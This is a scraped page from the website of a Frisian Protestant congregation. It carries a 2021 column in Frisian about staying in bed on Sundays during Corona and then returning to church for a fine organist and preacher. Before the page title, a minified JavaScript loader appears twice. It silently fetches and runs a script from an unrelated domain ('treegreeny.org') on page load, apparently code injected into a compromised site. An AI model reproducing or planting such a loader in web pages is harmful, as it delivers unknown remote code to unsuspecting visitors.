;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); O, kom uit de bedstee mijn liefste … - PKN Damwâld

O, kom uit de bedstee mijn liefste …

Gepubliceerd op: vrijdag 15 oktober 2021

Dit ferske spilet mij wolris troch de holle, as it moarns nog wol noflik leit. En, sa lang as der net ien op jo wachtet is it ek neat net slim om wat langer te lizzen.   Mar sûnt de Coronatiid der is ha ik der al lést fan, foarol sneintemoarns.  Dat sit sa; troch de corona- perikelen misse der in hiel soad minsken yn’t tsjerke, wy dus ek. Mar omdat wy net allegear mear yn’t tsjerke mochten fanwegen de risico’s op besmetting wie der net ien dy’t ús miste, sa fan; ik ha jim snein ek net sjoen….  En ja, as der sneins net ien “op jo wachtet”, dan bliuwe jo wat langer “yn é bedstee”, en lústerje bygelyks nei Prelude op Omrop Fryslân as in soarte fan opwarmer foar in tjinst op ‘e tablet of telefyzje.  Jo kin te kust en te keur, al falt it net ta om in “goeie” dûmny te finen, mar soks sil him ek oan de persoan lizze fansels. Likegoed, in goeie dûmny of net, mei in livestream bliuwt it behelpen, foarol as jo fan sjongen hâlde.   In pear wike lyn “sprong mijn hart hoog op in mij” toen’t ik seach yn ’t tsjerkeblédsje dat ús féste organist Tim vd Weide, nei in lange tiid fan siikwêzen, wer spylje soe, én, Gerrit Visser de foargonger wie.  Yntiids fan’t bed, de sneinske pronk oan en op nei de tsjerke……!   Wy ha der gjin spyt fan hân, wat siz ik, it wie prachtich!  In heldere preek, moaie lieten én; in geweldige organist !   Gjin bewerking fan it ien of’t oar, mar de prachtiche begelieding fan de “gemeentezang”. En as der no 5 of 500 yn’ tsjerke sitte, vd Weide nimt de sjongers mei, “omheech”…, boppe alle soargen út;   hy kin “preekje” troch én mei it oargel. Wûnderbaarlik!  Bidankt Tim en sûnens!

 

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns